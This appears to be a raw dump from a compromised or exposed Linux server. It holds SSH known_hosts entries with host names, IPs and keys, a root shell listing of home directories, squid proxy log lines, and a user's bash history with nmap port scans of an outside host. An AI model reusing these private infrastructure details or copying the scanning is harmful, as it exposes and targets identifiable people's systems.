AAAAB3NzaC1yc2EAAAABIwAAAIEAt3XaIhEoRK5sEKm6wtYyazLOx3w+Yv9+bpfEvLftH
r2hxZ2TY2A655iwMbgvhHqsMuGEjK9yGkZIQbUgB6HvOgOWOwJSX6Gc9Ac7GuH11xSU8t
HDuTQot6fVtgcm2Y/VUFi65Knz9rLHz7h/Zy29ek+UYav5T7juhBIuk57cDxs=
root@cache.ovh.net
localhost ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAxgnjMIPg1s3fGZPAtyFjtcDUGX6my1X7YFYnlv1y9
PL78if+wsBgT6SY9WWtqeu1owAjCMeMHPfU3GMV9Q5dGD74CSENGpfzMr8vrFc+D8yqj9
vS080AFByxp/NN9AFYFUn4c7rYfdnPzBt/ur5f51KzlVyhV++TcSBX4rToqxM=
10.48.100.81 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAwDm7jfhCI0rtwj5/Wpv3AvHN81RKb3lFALFhtl80i
1KB2pMlBJNRuAkgvkPFpleyKEHol6tYuMSMCn6qiV4rKJ1wcKoTyVlYNl296381PYdYNX
SlA58SD4ErWx5Ttz45iAJL8I/2ToxGOX0k1abAIEPiaCKIsf1k7/23jBkWjlE=
www.zloche.net,80.248.208.223 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAzYgpHj6TWctv9JPyCM/uWdHMWWgnMmR9KkDXZuiGV
SNc/FyxIq6soDPhQ6nsYw3NoKEczB1aC6u1RMqueWyd0LLZD2QIVmJ1ijRtQDibKXEmlq
uOTUNZzB0RQIKgI4FOlpojpqTMziRUom2qChYoVBFLimYvH+b3fclaQaSichE=
81.93.5.180 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAtSbs8/VCyV0KAFHWmggnC3QHa2qh9AYdUYE4OrbUK
7oA4Ozq8D5V2GYhBmpkMvYcCENNi7cxyeTEMdEeBWok/zRcxRkGYAxM7Zg2NsbIez9+bB
1ojKy5BoNLsocoQbvzgVbxOXHvRwcWTGK9H7Yq8ZJPLC4ezsOpAcyTeBHEeuM=
66.168.220.212 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAQEAtmDaXUYBfpbI9nFkhEnqjRxLMWLxfkDdxeKDMs5or
hRjRa8GQ1AC3KpC7y+TaonfUM/dSXR0+1K1BJUtTAWxe5ZeCDKL4phDbubxDIJvFKcTfN
i+bjiwkHlz1OKDThvqtRt781wcJRnSbnXinhZk8Ia3v6AIHsoB5x/yljSwznrSDWuVwn5
LSkNtISOiOX91ItfxwKi8B0ZgSBdUkmAHqMyej98cRVvY/iATI5SrFRCfWNkC7gH/oFxX
M/bKB94H7TZ4W6wtfdjmkBrYxojDbUKKEfd1LywcJCTYxab8usl+Q39uYvqTfXwJDIYX+
BE810BNmXi0QA6WlYUOpMJj9Q==
server4.zloche.net,213.251.160.26 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEA1nrkiWUjg+BGB83ed97xlvJYWNm8FeE91nhXx05mZ
4HVDADi0qGmYnlXbuywe7Kf4R42C5Gw+ZLMKdMYCsDqa89dqNuSl0Mx7/qHPS3oQW/nPF
C8cFo1pI6v/R180uxorB5ggcLV4mgbZZnc4TltUMbrLRHYfAi3HbwGj6bIiuE=
zloche.zapto.org ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAQEAt9hfTe460T8l2oPkq3WD7fnie6fzIWH9ep1HX8NVS
zLFT+fUlLzgpWUU+g1HycYAV4S5nSfG3FSsPfeEETXzBaaYeAU87qn3vtjuRU7Fp5Tv6m
PnFiOJuDwJ4wG3yA8+oyRzTMThfhnGDP+H90eacVPjxoTN0lQiM3VvmhR4j9rTfaVkx9B
DmUz2sorEMAHcpajK3h2dB124tiNR/IggGvXmwPUJym10O1QZKVrjCkdbacz9zV4ROmc5
c/hucKGwZH9mOW+Zo1GB2OP7LHMPPCmO7qymvG67eOsyc/QmBQcsqBSPYmC1xNms9c6cb
nZeUvjYFY0rfQql39oytXeJ7w==
server4 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEA1nrkiWUjg+BGB83ed97xlvJYWNm8FeE91nhXx05mZ
4HVDADi0qGmYnlXbuywe7Kf4R42C5Gw+ZLMKdMYCsDqa89dqNuSl0Mx7/qHPS3oQW/nPF
C8cFo1pI6v/R180uxorB5ggcLV4mgbZZnc4TltUMbrLRHYfAi3HbwGj6bIiuE=
server3 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAzYgpHj6TWctv9JPyCM/uWdHMWWgnMmR9KkDXZuiGV
SNc/FyxIq6soDPhQ6nsYw3NoKEczB1aC6u1RMqueWyd0LLZD2QIVmJ1ijRtQDibKXEmlq
uOTUNZzB0RQIKgI4FOlpojpqTMziRUom2qChYoVBFLimYvH+b3fclaQaSichE=
server1.zloche.net,65.92.158.240 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAQEAt9hfTe460T8l2oPkq3WD7fnie6fzIWH9ep1HX8NVS
zLFT+fUlLzgpWUU+g1HycYAV4S5nSfG3FSsPfeEETXzBaaYeAU87qn3vtjuRU7Fp5Tv6m
PnFiOJuDwJ4wG3yA8+oyRzTMThfhnGDP+H90eacVPjxoTN0lQiM3VvmhR4j9rTfaVkx9B
DmUz2sorEMAHcpajK3h2dB124tiNR/IggGvXmwPUJym10O1QZKVrjCkdbacz9zV4ROmc5
c/hucKGwZH9mOW+Zo1GB2OP7LHMPPCmO7qymvG67eOsyc/QmBQcsqBSPYmC1xNms9c6cb
nZeUvjYFY0rfQql39oytXeJ7w==
server1 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAQEAt9hfTe460T8l2oPkq3WD7fnie6fzIWH9ep1HX8NVS
zLFT+fUlLzgpWUU+g1HycYAV4S5nSfG3FSsPfeEETXzBaaYeAU87qn3vtjuRU7Fp5Tv6m
PnFiOJuDwJ4wG3yA8+oyRzTMThfhnGDP+H90eacVPjxoTN0lQiM3VvmhR4j9rTfaVkx9B
DmUz2sorEMAHcpajK3h2dB124tiNR/IggGvXmwPUJym10O1QZKVrjCkdbacz9zV4ROmc5
c/hucKGwZH9mOW+Zo1GB2OP7LHMPPCmO7qymvG67eOsyc/QmBQcsqBSPYmC1xNms9c6cb
nZeUvjYFY0rfQql39oytXeJ7w==
65.94.126.14 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAQEAt9hfTe460T8l2oPkq3WD7fnie6fzIWH9ep1HX8NVS
zLFT+fUlLzgpWUU+g1HycYAV4S5nSfG3FSsPfeEETXzBaaYeAU87qn3vtjuRU7Fp5Tv6m
PnFiOJuDwJ4wG3yA8+oyRzTMThfhnGDP+H90eacVPjxoTN0lQiM3VvmhR4j9rTfaVkx9B
DmUz2sorEMAHcpajK3h2dB124tiNR/IggGvXmwPUJym10O1QZKVrjCkdbacz9zV4ROmc5
c/hucKGwZH9mOW+Zo1GB2OP7LHMPPCmO7qymvG67eOsyc/QmBQcsqBSPYmC1xNms9c6cb
nZeUvjYFY0rfQql39oytXeJ7w==
www.zloche.com ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAtSbs8/VCyV0KAFHWmggnC3QHa2qh9AYdUYE4OrbUK
7oA4Ozq8D5V2GYhBmpkMvYcCENNi7cxyeTEMdEeBWok/zRcxRkGYAxM7Zg2NsbIez9+bB
1ojKy5BoNLsocoQbvzgVbxOXHvRwcWTGK9H7Yq8ZJPLC4ezsOpAcyTeBHEeuM=
127.0.0.1 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEA1nrkiWUjg+BGB83ed97xlvJYWNm8FeE91nhXx05mZ
4HVDADi0qGmYnlXbuywe7Kf4R42C5Gw+ZLMKdMYCsDqa89dqNuSl0Mx7/qHPS3oQW/nPF
C8cFo1pI6v/R180uxorB5ggcLV4mgbZZnc4TltUMbrLRHYfAi3HbwGj6bIiuE=
irc.liveits.com,68.117.250.132 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAQEA4BAf00qd6FUDb41gGvjrAzt4fl7T52sPSZt6rj7sm
8JmBZcwiZbQLos4WWQ9C8EeWRwk8mP7DmoHapC8qs/PIfUOturidZUPWIpn/RQ5E/BiVy
9q+vSI0Oz3s7KXoD4LbCqzSca9jbKSdk1BlH8Jz+fOG5+XUcOYmcbaSYU73PqLt+gJ+Ye
XspnBjCCqA7/sD6KfgWAYQh8KiJYjciUJ1Kc5tw8MISW0v3Sxphp8QlcuAk1M8zKSP8uZ
Z4Dsiw/r75SjFCTNKOCr8dzcKwL3tyMRtPGH0sRDmLQI4ndmBEb1gldknSUZOilDVlYJK
K7phyzopzd+GXSXlIhWnhFc8w==
localhost ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAxgnjMIPg1s3fGZPAtyFjtcDUGX6my1X7YFYnlv1y9
PL78if+wsBgT6SY9WWtqeu1owAjCMeMHPfU3GMV9Q5dGD74CSENGpfzMr8vrFc+D8yqj9
vS080AFByxp/NN9AFYFUn4c7rYfdnPzBt/ur5f51KzlVyhV++TcSBX4rToqxM=
10.48.100.81 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAwDm7jfhCI0rtwj5/Wpv3AvHN81RKb3lFALFhtl80i
1KB2pMlBJNRuAkgvkPFpleyKEHol6tYuMSMCn6qiV4rKJ1wcKoTyVlYNl296381PYdYNX
SlA58SD4ErWx5Ttz45iAJL8I/2ToxGOX0k1abAIEPiaCKIsf1k7/23jBkWjlE=
www.zloche.net,80.248.208.223 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAzYgpHj6TWctv9JPyCM/uWdHMWWgnMmR9KkDXZuiGV
SNc/FyxIq6soDPhQ6nsYw3NoKEczB1aC6u1RMqueWyd0LLZD2QIVmJ1ijRtQDibKXEmlq
uOTUNZzB0RQIKgI4FOlpojpqTMziRUom2qChYoVBFLimYvH+b3fclaQaSichE=
81.93.5.180 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAtSbs8/VCyV0KAFHWmggnC3QHa2qh9AYdUYE4OrbUK
7oA4Ozq8D5V2GYhBmpkMvYcCENNi7cxyeTEMdEeBWok/zRcxRkGYAxM7Zg2NsbIez9+bB
1ojKy5BoNLsocoQbvzgVbxOXHvRwcWTGK9H7Yq8ZJPLC4ezsOpAcyTeBHEeuM=
66.168.220.212
ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAQEAtmDaXUYBfpbI9nFkhEnqjRxLMWLxfkDdxeKDMs5or
hRjRa8GQ1AC3KpC7y+TaonfUM/dSXR0+1K1BJUtTAWxe5ZeCDKL4phDbubxDIJvFKcTfN
i+bjiwkHlz1OKDThvqtRt781wcJRnSbnXinhZk8Ia3v6AIHsoB5x/yljSwznrSDWuVwn5
LSkNtISOiOX91ItfxwKi8B0ZgSBdUkmAHqMyej98cRVvY/iATI5SrFRCfWNkC7gH/oFxX
M/bKB94H7TZ4W6wtfdjmkBrYxojDbUKKEfd1LywcJCTYxab8usl+Q39uYvqTfXwJDIYX+
BE810BNmXi0QA6WlYUOpMJj9Q==
irc.liveits.com ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAQEAtmDaXUYBfpbI9nFkhEnqjRxLMWLxfkDdxeKDMs5or
hRjRa8GQ1AC3KpC7y+TaonfUM/dSXR0+1K1BJUtTAWxe5ZeCDKL4phDbubxDIJvFKcTfN
i+bjiwkHlz1OKDThvqtRt781wcJRnSbnXinhZk8Ia3v6AIHsoB5x/yljSwznrSDWuVwn5
LSkNtISOiOX91ItfxwKi8B0ZgSBdUkmAHqMyej98cRVvY/iATI5SrFRCfWNkC7gH/oFxX
M/bKB94H7TZ4W6wtfdjmkBrYxojDbUKKEfd1LywcJCTYxab8usl+Q39uYvqTfXwJDIYX+
BE810BNmXi0QA6WlYUOpMJj9Q==
server1.zloche.net,65.92.158.240 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAziexE08HtpgQFXCsqn1Hg0bn54ZzecIYNyNZzwK45
zhO03/wr3pGmQtZQbv9R2Jma/vSW7IFPmz2ZyZodLpr3QciqqPOn5xvC7GFLrrrlBYzX8
uggew4gUq9Uc9vxXrDKHh2aAz7rA+gPOM/1iq1Xuve754ZTOhdSXaasNJMb4U=
server4.zloche.net,213.251.160.26 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEA1nrkiWUjg+BGB83ed97xlvJYWNm8FeE91nhXx05mZ
4HVDADi0qGmYnlXbuywe7Kf4R42C5Gw+ZLMKdMYCsDqa89dqNuSl0Mx7/qHPS3oQW/nPF
C8cFo1pI6v/R180uxorB5ggcLV4mgbZZnc4TltUMbrLRHYfAi3HbwGj6bIiuE=
zloche.zapto.org ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAQEAt9hfTe460T8l2oPkq3WD7fnie6fzIWH9ep1HX8NVS
zLFT+fUlLzgpWUU+g1HycYAV4S5nSfG3FSsPfeEETXzBaaYeAU87qn3vtjuRU7Fp5Tv6m
PnFiOJuDwJ4wG3yA8+oyRzTMThfhnGDP+H90eacVPjxoTN0lQiM3VvmhR4j9rTfaVkx9B
DmUz2sorEMAHcpajK3h2dB124tiNR/IggGvXmwPUJym10O1QZKVrjCkdbacz9zV4ROmc5
c/hucKGwZH9mOW+Zo1GB2OP7LHMPPCmO7qymvG67eOsyc/QmBQcsqBSPYmC1xNms9c6cb
nZeUvjYFY0rfQql39oytXeJ7w==
server4 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEA1nrkiWUjg+BGB83ed97xlvJYWNm8FeE91nhXx05mZ
4HVDADi0qGmYnlXbuywe7Kf4R42C5Gw+ZLMKdMYCsDqa89dqNuSl0Mx7/qHPS3oQW/nPF
C8cFo1pI6v/R180uxorB5ggcLV4mgbZZnc4TltUMbrLRHYfAi3HbwGj6bIiuE=
server3 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAzYgpHj6TWctv9JPyCM/uWdHMWWgnMmR9KkDXZuiGV
SNc/FyxIq6soDPhQ6nsYw3NoKEczB1aC6u1RMqueWyd0LLZD2QIVmJ1ijRtQDibKXEmlq
uOTUNZzB0RQIKgI4FOlpojpqTMziRUom2qChYoVBFLimYvH+b3fclaQaSichE=
server4:/home# ls -alh
total 673M
d-wx--s--x 17 root root 4.0K May 6 03:51 .
drwxr-xr-x 21 root root 4.0K Feb 13 02:25 ..
-rw-r----- 1 proxy proxy 673M May 6 03:51 access.log
drwxrwxrwx 8 chat chat 4.0K Mar 29 13:36 chat
drwxr-xr-x 3 djdd djdd 4.0K Feb 1 04:28 djdd
drwxr-sr-x 2 root nogroup 4.0K Jan 30 00:11 ftp
drwxr-xr-x 2 gnomex gnomex 4.0K Apr 13 22:21 gnomex
drwxr-xr-x 10 gumbie gumbie 4.0K May 30 04:45 gumbie
drwxrwxrwx 12 hlds hlds 8.0K Mar 3 19:31 hlds
drwxr-xr-x 6 ircd ircd 4.0K Feb 7 05:18 ircd
drwx------ 2 root root 16K Jan 28 14:14 lost+found
drwxr-xr-x 7 madstorm madstorm 4.0K Apr 1 09:30 madstorm
drwxr-xr-x 8 misterinfo misterinfo 4.0K Feb 16 22:54 misterinfo
drwx------ 5 prototype prototype 4.0K Jun 3 20:01 prototype
drwxr-xr-x 25 stax stax 4.0K Jun 8 04:51 stax
drwxrwxrwx 5 www www 4.0K Apr 27 18:28 www
drwxrwxrwx 9 xposedbones xposedbones 4.0K Mar 31 01:07 xposedbones
drwxr-xr-x 6 yumiro yumiro 4.0K Jun 7 18:47 yumiro
server4:/home# head access.log
1178339246.919 74 58.211.123.102 TCP_MISS/302 524 GET
http://ad.iconadserver.com/imp? - DIRECT/208.67.68.11 -
1178339246.955 34 58.211.123.102 TCP_MISS/302 522 GET
http://ad.iconadserver.com/imp? - DIRECT/208.67.68.11 -
1178339246.969 1314 72.36.179.122 TCP_MISS/200 14794 GET
http://www.gzlvc.com/mfkiqpl/guestbook.asp - DIRECT/69.25.142.5 text/html
1178339246.969 565 72.232.14.66 TCP_MISS/302 503 POST
http://mino.s35.xrea.com/mino/cbbs.cgi - DIRECT/219.163.200.87 text/html
1178339247.011 1161 66.232.123.181 TCP_MISS/200 7229 POST
http://hamohamo-web.hp.infoseek.co.jp/cgi-bin/light62/./light.cgi -
DIRECT/210.148.115.140 text/html
1178339247.051 2061 72.232.14.66 TCP_MISS/200 494 POST
http://kevadlilleke.pri.ee/wp-comments-post.php - DIRECT/194.106.101.165
text/html
1178339247.088 25 58.211.123.102 TCP_MISS/302 519 GET
http://ad.iconadserver.com/imp? - DIRECT/208.67.68.11 -
1178339247.125 1970 72.232.14.66 TCP_MISS/302 511 POST
http://www.stratabase.com/resync/phorum/post.php - DIRECT/207.81.157.129
text/html
1178339247.132 40 58.211.123.98 TCP_MISS/200 1631 GET
http://ad.yieldmanager.com/imp? - DIRECT/208.67.68.11 application/x-javascript
1178339247.147 1334 58.211.123.102 TCP_HIT/200 12680 GET
http://content.iconadserver.com/rmtag3.js - NONE/- application/x-javascript
server4:/home# cd stax
server4:/home/stax# ls -alh
total 793M
-rw-r-xr-- 1 stax stax 5 May 23 19:01 #TMPZONLINE#
-rwxrwxrwx 1 stax stax 3 Apr 18 23:59 #msnbot#
drwxr-xr-x 25 stax stax 4.0K Jun 8 04:51 .
d-wx--s--x 17 root root 4.0K May 6 03:51 ..
-rw-r--r-- 1 stax stax 266 Jan 28 17:48 .alias
-rw------- 1 stax stax 8.5K Jun 9 01:45 .bash_history
-rw-r--r-- 1 stax stax 567 Jan 28 17:48 .bash_profile
-rw-r--r-- 1 stax stax 1.8K Jan 28 17:48 .bashrc
-rw-r--r-- 1 stax stax 375 Jan 28 17:48 .cshrc
drwx------ 2 root root 4.0K Apr 26 18:04 .elinks
drwxr-xr-x 3 root root 4.0K Jan 28 21:41 .emacs.d
drwx------ 2 root root 4.0K Jan 28 18:18 .links
-rw------- 1 root root 0 Jan 28 23:12 .mysql_history
-rw------- 1 root root 1.0K Feb 1 04:23 .rnd
drwx------ 2 stax stax 4.0K Apr 4 18:43 .ssh
drwxr-x--- 2 stax stax 4.0K Jan 28 21:25 .steam
-rwxrwxrwx 1 stax stax 25K Mar 27 05:44 Charlie Gordon est un simple
d.doc
-rwxrwxrwx 1 stax stax 25K Mar 29 18:28
Charlie_Gordon_est_un_simple_d.doc
drwxr-xr-x 2 stax stax 4.0K May 6 04:44 DEVLulZ
-rw-r--r-- 1 stax stax 256K Jun 4 18:27 Death_Note_18_anime-master_fr.rar
-rw-r--r-- 1 stax stax 165M Apr 28 10:08 Death_Note_28_anime-master_fr.rar
-rw-r--r-- 1 stax stax 165M May 5 11:42 Death_Note_29_anime-master_fr.rar
-rw-r--r-- 1 stax stax 164M May 13 19:08 Death_Note_30_anime-master_fr.rar
-rw-r--r-- 1 stax stax 8.8M Jun 4 18:28 Death_Note_31_anime-master_fr.rar
-rw-r--r-- 1 stax stax 164M May 22 18:03
Death_Note_31_anime-master_fr.rar.1
-rw-r--r-- 1 stax stax 108M Apr 29 21:34 Flash8-en.exe
-rwxrwxrwx 1 stax stax 2.1M Apr 5 23:44 Infomercial.mov
drwxr-xr-x 2 stax stax 4.0K May 23 19:02 TMPZONLINE
-rw-r--r-- 1 stax stax 19K May 20 10:12 WebServer.php
drwxrwxrwx 12 hlds hlds 4.0K Jun 1 2006 amxmodx_
-rwxrwxrwx 1 root root 30K Jan 30 08:33 asdasd.txt
-rw-r--r-- 1 stax stax 5.0K Jun 6 18:45 b0t.php
-rw-r--r-- 1 stax stax 5.0K Jun 6 18:43 b0t.php~
drwxr-xr-x 2 stax stax 4.0K May 30 23:24 bidvertads
-rwxrwxrwx 1 stax stax 83 Feb 22 01:01 cmd.for.dl.txt
drwxr-xr-x 2 stax stax 20K Apr 26 00:36 comics
drwxr-xr-x 2 stax stax 4.0K Apr 25 23:45 ctrlaltdel
drwxr-xr-x 6 stax stax 4.0K Jun 8 03:42 files
drwxrwxrwx 3 root root 4.0K Feb 12 01:35 firefox-2.0
-rw-r--r-- 1 stax stax 728 May 20 05:51 http.php
-rw-r--r-- 1 stax stax 728 May 20 05:50 http.php~
drwxrwxrwx 3 stax stax 4.0K Apr 23 04:47 irc-server
-rwxrwxrwx 1 stax stax 3.7K Feb 14 05:24 meh.sh
-rwxrwxrwx 1 root root 9.3K Jan 30 00:38 meh.txt
-rwxrwxrwx 1 root root 27K Jan 30 00:38 meh.txt2
drwxrwxrwx 4 stax stax 4.0K Jun 8 16:53 msnbot
-rw------- 1 stax stax 270K Jun 4 18:33 nohup.out
-rw-r--r-- 1 stax stax 167 May 2 18:21 notimeout.php
-rw-r--r-- 1 stax stax 156 May 2 18:15 notimeout.php~
-rw-r--r-- 1 stax stax 54 May 16 18:31 omfgjavacourse.txt
drwxrwxrwx 2 stax stax 4.0K Mar 28 18:11 projet_francais
drwxr-xr-x 2 stax stax 4.0K Apr 28 05:56 public_html
-rw-r--r-- 1 stax stax 4.7K Jun 3 22:29 real.bot
-rw-r--r-- 1 stax stax 4.7K Jun 3 10:25 real.bot~
-rwxrwxrwx 1 root root 1.9K Apr 29 23:43 richo.py
-rw-r--r-- 1 stax stax 0 Jun 6 18:50 say
drwxr-xr-x 2 stax stax 4.0K Jun 8 03:56 sessions
drwxrwxr-x 2 stax shared 4.0K Apr 28 05:04 shared
-rwxrwxrwx 1 stax stax 118K Feb 7 04:49 squid.conf
-rw-r--r-- 1 stax stax 143 Jun 6 18:36 talk.php
drwxr-xr-x 2 stax stax 320K Jun 7 18:58 vaginite
drwxrwxrwx 2 stax stax 4.0K Apr 4 23:42 ventrilo
-rwxrwxrwx 1 root root 10M Jan 21 22:15 webmin_1.320_all.deb
drwxrwxrwx 6 stax stax 4.0K Feb 19 01:21 webtv
-rw-r--r-- 1 stax stax 77 May 14 00:09 wget.txt
-rw-r--r-- 1 stax stax 1014 Apr 26 00:33 yay.php
-rw-r--r-- 1 stax stax 1014 Apr 26 00:24 yay.php~
-rwxrwxrwx 1 stax stax 5.4M Mar 5 07:09 zonline.tar
drwxr-xr-x 2 stax stax 4.0K Jun 8 05:36 zradio-script
server4:/home/stax# more .bash_history
ssh zloche@server3
ssh server2
ssh zloche@server3
ssh server2
ssh server2
w
ssh zloche@server3
ssh zloche@zloche.net
ls
ssh zloche@zloche.net
w
ls
mkdir bidvertads
cd bidvertads/
wget
http://secure.bidvertiser.com/performance/bdv_rd.dbm?enparms=72,154468,2234
28,385,984,522,533,548,388,587&REF=www.zloche.net/chat%2F&TREF=1&WIN_NAME=null&e
nparms2=632,154696,223695,581,632,632,616,1130,970,587,582&jloc=http%3A//bdv.bid
vertiser.com/BidVertiser.dbm%3Fpid%3D44284%26bid%3D154114%26RD%3D3056626%26DIF%3
D1%26REF%3Dwww%252Ezloche%252Enet%252Fchat%252F%26tref%3D1%26win_name%3Dnull%26j
srand%3D125549%26js1loc%3Dhttp%253A//www.zloche.net/chat/
wget
"http://secure.bidvertiser.com/performance/bdv_rd.dbm?enparms=72,154468,223
428,385,984,522,533,548,388,587&REF=www.zloche.net/chat%2F&TREF=1&WIN_NAME=null&
enparms2=632,154696,223695,581,632,632,616,1130,970,587,582&jloc=http%3A//bdv.bi
--More--(10%)
dvertiser.com/BidVertiser.dbm%3Fpid%3D44284%26bid%3D154114%26RD%3D3056626%26DIF%
3D1%26REF%3Dwww%252Ezloche%252Enet%252Fchat%252F%26tref%3D1%26win_name%3Dnull%26
jsrand%3D125549%26js1loc%3Dhttp%253A//www.zloche.net/chat/"
wget
"http://secure.bidvertiser.com/performance/bdv_rd.dbm?enparms=72,154468,223
428,385,984,522,533,548,388,587&REF=www.zloche.net/chat%2F&TREF=1&WIN_NAME=null&
enparms2=632,154696,223695,581,632,632,616,1130,970,587,582&jloc=http%3A//bdv.bi
dvertiser.com/BidVertiser.dbm%3Fpid%3D44284%26bid%3D154114%26RD%3D3056626%26DIF%
3D1%26REF%3Dwww%252Ezloche%252Enet%252Fchat%252F%26tref%3D1%26win_name%3Dnull%26
jsrand%3D125549%26js1loc%3Dhttp%253A//www.zloche.net/chat/"
wget
"http://secure.bidvertiser.com/performance/bdv_rd.dbm?enparms=72,154468,223
428,385,984,522,533,548,388,587&REF=www.zloche.net/chat%2F&TREF=1&WIN_NAME=null&
enparms2=632,154696,223695,581,632,632,616,1130,970,587,582&jloc=http%3A//bdv.bi
dvertiser.com/BidVertiser.dbm%3Fpid%3D44284%26bid%3D154114%26RD%3D3056626%26DIF%
3D1%26REF%3Dwww%252Ezloche%252Enet%252Fchat%252F%26tref%3D1%26win_name%3Dnull%26
jsrand%3D125549%26js1loc%3Dhttp%253A//www.zloche.net/chat/"
wget
"http://secure.bidvertiser.com/performance/bdv_rd.dbm?enparms=72,154468,223
428,385,984,522,533,548,388,587&REF=www.zloche.net/chat%2F&TREF=1&WIN_NAME=null&
enparms2=632,154696,223695,581,632,632,616,1130,970,587,582&jloc=http%3A//bdv.bi
dvertiser.com/BidVertiser.dbm%3Fpid%3D44284%26bid%3D154114%26RD%3D3056626%26DIF%
3D1%26REF%3Dwww%252Ezloche%252Enet%252Fchat%252F%26tref%3D1%26win_name%3Dnull%26
jsrand%3D125549%26js1loc%3Dhttp%253A//www.zloche.net/chat/"
w
cd ~pro
--More--(28%)
cd ~proxy/
ls
namp -sad
nmap -sad
nmap p 0-9999999
nmap p 0-9999999 localhost
nmap -p0-9999999 localhost
nmap -p0-65535 localhost
cd /www/server4/animes/
ls
emacs .htaccess
ssh server2
w
w
w
who
ssh stax@server2
ssh stax@server3
ssh stax@server3.zloche.net
ssh stax@zloche.net
w
emacs real.bot
emacs real.bot
--More--(32%)
php real.bot
emacs real.bot
php real.bot
emacs real.bot
php real.bot
emacs real.bot
php real.bot
php real.bot
emacs real.bot
php real.bot
emacs real.bot
php real.bot
emacs real.bot
php real.bot
emacs real.bot
php real.bot
emacs real.bot
php real.bot
emacs real.bot
php real.bot
emacs real.bot
php real.bot
emacs real.bot
--More--(36%)
php real.bot
emacs real.bot
php real.bot
emacs real.bot
php real.bot
emacs real.bot
emacs real.bot
emacs real.bot
php real.bot
emacs real.bot
php real.bot
emacs real.bot
php real.bot
emacs real.bot
php real.bot
emacs real.bot
php real.bot
w
w
php real.bot
emacs real.bot
php real.bot
emacs real.bot
--More--(39%)
php real.bot
emacs real.bot
php real.bot
emacs real.bot
php real.bot
emacs real.bot
php real.bot
emacs real.bot
php real.bot
emacs real.bot
php real.bot
emacs real.bot
php real.bot
emacs real.bot
php real.bot
emacs real.bot
php real.bot
emacs real.bot
php real.bot
php real.bot
emacs real.bot
php real.bot
emacs real.bot
--More--(43%)
php real.bot
emacs real.bot
php real.bot
w
ssh zloche@server3
ssh zloche@zloche.net
w
top -aef
top -zef
top -bef
top -bf
top -b
ping ks33756.kimsufi.com
ping ks33756.kimsufi.com
nmap ks33756.kimsufi.com
w
w
w
w
w
w
w
w
--More--(45%)
w
w
ww
w
w
w
whois 68.98.115.176
ssh zloche@www.zloche.net
w
ls
cd msnbot/
emacs msnbot.php
ls *
ls * | ls */* | ls */*/*
w
ls * | ls */*
w
ls
cd www/
ls
ls
cd chat__/
ls
--More--(47%)
w
w
ssh stax@www.zloche.net
w
who
ls
less cmd.for.dl.txt
wget
http://88.191.14.73/awarefirst/Death%20Note/Death_Note_18_anime-master_fr.
rar
wget
http://88.191.14.73/awarefirst/Death%20Note/Death_Note_31_anime-master_fr.
rar
nohup wget
http://88.191.14.73/awarefirst/Death%20Note/Death_Note_31_anime-mast
er_fr.rar &
ls
cd /
ls
sudo bash
w
ssh zloche@zloche.net
php real.bot
w
w
php real.bot
--More--(52%)
w
ssh zloche@www.zloche.net
write yumiro
ls
cp real.bot /www/server4/4yumiro.phps
w
ssh zloche@www.zloche.net
cp /home/yumiro/bot.php b0t.php
emacs b0t.php
emacs b0t.php
emacs talk.php
php b0t.php &
emacs say
pgp b0t.php
php b0t.php
php b0t.php &
php talk.php
cp talk.php /www/home/yumiro/talk.php
cp talk.php /home/yumiro/talk.php
cp talk.php /www/server4/talk.phps
php talk.php
kill 24874
emacs b0t.php
--More--(57%)
php b0t.php
php b0t.php &
kill 21145
emacs b0t.php
php b0t.php &
kill 7829
emacs b0t.php
php b0t.php &
php talk.php
sudo su zloche
ssh zloche@www.zloche.net
w
top -b |grep php
top -b |grep php
kill 20493 791
top -b |grep php
kill 17412
wall
wall
wall
w
ssh zloche@www.zloche.net
w
--More--(60%)
write djdd
w
w
w
w
w
w
w
w
w
top -b |grep php
sudo bash
w
top
ls
cd msnbot/
ls
emacs msnbot.php
top -b
killall php
nohup php msnbot.php
nohup php msnbot.php &
w
--More--(62%)
w
less nohup.out
du -csh nohup.out
w
w
w
w
top
cd ..
mkdir vaginite
emacs php.php
mv php.php vaginite/
cd vaginite/
php php.php
ls
php php.php
w
du -csh
ls * |grep 'vaginite'
du
ls * |grep -n '*'
ls * |grep -n '_'
ls
--More--(64%)
ls |grep -n "vaginite"
ssh stax@www.zloche.net
ssh stax@www.zloche.net
ssh stax@www.zloche.net
ping www.zloche.net
ping www.zloche.net
ssh stax@www.zloche.net
ssh stax@www.zloche.net
ssh stax@www.zloche.net
ssh stax@www.zloche.net
w
w
ssh stax@80.248.208.223
ping 80.248.208.223
ssh stax@80.248.208.223
w
ssh stax@80.248.208.223
ssh stax@80.248.208.223
ssh stax@80.248.208.223
ssh stax@80.248.208.223
w
ssh stax@80.248.208.223
ping www.zloche.net
--More--(69%)
w
w
ssh stax@server3
ssh stax@www.zloche.net
ping www.zloche.net
ping www.zloche.net
w
who
ls
w
cd files/
ls
cd ..
ssh stax@server3
ssh stax@www.zloche.net
ping www.zloche.net
php real.bot
php http.php
;s
ls
php WebServer.php
w
pimg www.zloche.net
--More--(72%)
